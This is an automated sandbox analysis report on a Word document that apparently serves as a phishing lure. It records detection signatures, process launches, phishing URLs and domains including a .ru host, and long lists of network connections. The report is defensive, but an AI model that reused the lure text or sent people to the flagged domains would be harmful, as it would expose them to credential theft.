Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2024 Tepa LLC RFP Proposal.docx

Overview

General Information

Sample name:2024 Tepa LLC RFP Proposal.docx
Analysis ID:1573952
MD5:f6e7c0dcd109f8f1b7b8c84fdf180d12
SHA1:c8864f7422d5c4455e606030ba5e8f295ff2272b
SHA256:ea1e479fdb763eb2055f6ee97b9b87a950271d32561dc090758109ae6dc33ce1
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Phishing site or detected (based on various text indicators)
Drops files with a non-matching file extension (content does not match file extension)
HTML body contains low number of good links
HTML body contains password input but no form action
Sigma detected: Suspicious Office Outbound Connections
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • WINWORD.EXE (PID: 3632 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\2024 Tepa LLC RFP Proposal.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • chrome.exe (PID: 452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGN MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 6616 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1964,i,2873093495231121643,14732922469924082370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 1.1.1.1, DestinationIsIpv6: false, DestinationPort: 53, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 3632, Protocol: tcp, SourceIp: 192.168.2.18, SourceIsIpv6: false, SourcePort: 49732
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falseJoe Sandbox AI: Page contains button: 'VIEW DOCUMENT HERE' Source: '2.5.pages.csv'
Source: 1.16.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wla3.ensfulthal.com/mw2hN4k/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 1.17.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wla3.ensfulthal.com/mw2hN4k/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's system.
Source: Chrome DOM: 2.5OCR Text: Sign Dcruments Project I Pages This document has been signed by all parties. You have received (2) New PDF Document for Your Review Please sign and return VIEW DOCUMENT HERE English
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: Number of links: 1
Source: https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falseHTTP Parser: Number of links: 1
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: <input type="password" .../> found
Source: https://wla3.ensfulthal.com/mw2hN4k/HTTP Parser: No favicon
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: No <meta name="author".. found
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: No <meta name="author".. found
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: No <meta name="author".. found
Source: https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falseHTTP Parser: No <meta name="author".. found
Source: https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falseHTTP Parser: No <meta name="author".. found
Source: https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falseHTTP Parser: No <meta name="author".. found
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: No <meta name="copyright".. found
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: No <meta name="copyright".. found
Source: https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNHTTP Parser: No <meta name="copyright".. found
Source: https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falseHTTP Parser: No <meta name="copyright".. found
Source: https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falseHTTP Parser: No <meta name="copyright".. found
Source: https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falseHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49816 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.147.9:443 -> 192.168.2.18:49855 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.16.158.170:443 -> 192.168.2.18:49861 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 0MB later: 29MB
Source: winword.exeMemory has grown: Private usage: 0MB later: 23MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.9
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.9
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: global trafficDNS traffic detected: DNS query: sign.zoho.eu
Source: global trafficDNS traffic detected: DNS query: static.zohocdn.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: webfonts.zohowebstatic.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: files-accl.zohopublic.eu
Source: global trafficDNS traffic detected: DNS query: wla3.ensfulthal.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: nw2iycgst5mfz3kmc6onhudkkvl7u1mxoob5ixnhoc7c0jiwqzqza.lpliwptf.ru
Source: global trafficDNS traffic detected: DNS query: www.outlook.com
Source: global trafficDNS traffic detected: DNS query: outlook.live.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
